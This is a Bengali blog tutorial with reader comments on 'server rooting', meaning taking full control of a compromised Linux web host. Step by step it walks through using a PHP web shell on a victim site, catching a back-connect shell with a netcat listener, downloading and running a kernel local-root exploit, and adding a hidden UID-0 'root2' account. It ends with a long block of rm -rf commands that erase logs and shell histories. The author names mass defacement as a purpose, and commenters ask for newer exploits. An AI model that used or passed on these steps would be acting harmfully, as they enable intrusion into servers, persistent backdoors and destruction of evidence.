সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

12
741

আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ? 

সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে  আপনার উইন্ডোজ পিসি  দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু  আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

কাজের ধারা >>>>
যা যা লাগবে

> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT

Step 1 – Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল

2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি
exploit-db, 1337day, th3-0utl4ws  এসব  সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 – Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না …… গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার  netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit “Enter”
এই কাজ কিন্তু cmd তে করতে হবে

তাহলে এটি রিপ্লাই দেবে এরকম  “listening on [any] 443 …”
সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি “BackConnect function” পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
 

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

Step 3 – Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using ‘wget’ function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি
। এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits…8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক  টাইপ করুন  । তাহলে এটি সার্ভারে 
“2.6.18-164.zip” নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি
anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?
আপনি যদি এক্সপ্লইট কে যে কোন  নাম যেমন anyrandomname.zip ডাউনলোড করেন তাহলে টাইপ করুন
unzip anyrandomname.zip
সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?
এখন আপনি আপনার এক্সপ্লইট পাবেন  (Like mine “2.6.18-164”)
এখন সবগুল ধাপ সম্পন্ন করার পর ……………………….

Type:chmod 777 yourexploit’sname
আমি যেখানে  your exploit লিখলাম   সেখানে আপনি নিজের টা লিখবেন

এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit’sname
To check if you got root type
id
or
whoami

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

Step 4 – Adding root user
মানে আসল অ্যাডমিন ছাড়া  অন্যদের  এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

কম্যান্ড এর ব্যাখা
Quote:adduser – এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়

-u 0 -o – Set the value of user id to 0.

-g 0 – Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 – Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M – ‘home directory’ not created for the user.

root2 –  এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি  ইচ্ছা মত নাম দিতে পারেন

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)
একটি উদাহরণ দেখুন

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

আপনি ঠিকমত  করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন

id root2
(Root2 is your username)

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

 GNY shell – http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat – 
এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/

Clearing Logs:

এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name “log*” -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু >
http://www.facebook.com/CY133R  এ
আর আমি > http://www.facebook.com/techfreak.unknown
আল্লাহ হাফেয
……………………………………………………………….10%3∞ …………………………………………………………..

 

 

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

12 মন্তব্য

  1. লিঙ্ক আপনি অরিজিনাল টাই দিয়েছিলেন। অনেক আগে অই লিঙ্ক টা কাজ করত। এখন করে না। সাইট বন্ধ। আমার লিঙ্ক এর দরকার নাই। কালেকশন অনেক আছে। :)

  2. সবাইকে ধন্যবাদ
    @ ডার্ক VORTEX
    দেখুন এখানে তো আমি আপনাকে লোকাল এক্সপ্লইট লিঙ্ক দিয়ে দেব না……
    এটা কে উদাহরণ হিসেবে নিতে পারেন………। তাই আপনি আপনার নিজের টা তৈরি করবেন । আশা করি বুঝতে পেরেছেন

  3. আপনার এক্সপ্লইট অ্যাড্রেস রিনিউ করেন। লিঙ্ক এক্সপায়ার হয়ে গাছে :)

  4. সুন্দর পোস্ট করেছেন। কিন্তু এখন লোকাল রুট আপনি যেটা দিছেন। সেটা কাজ করবে না। এখন কারনাল ভার্সন ২.৬.৩৬। নতুন এক্সপ্লইট পোস্ট করেন। তাহলে টিউটোরিয়াল তা সম্পূর্ণ হবে :)।

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

five × 5 =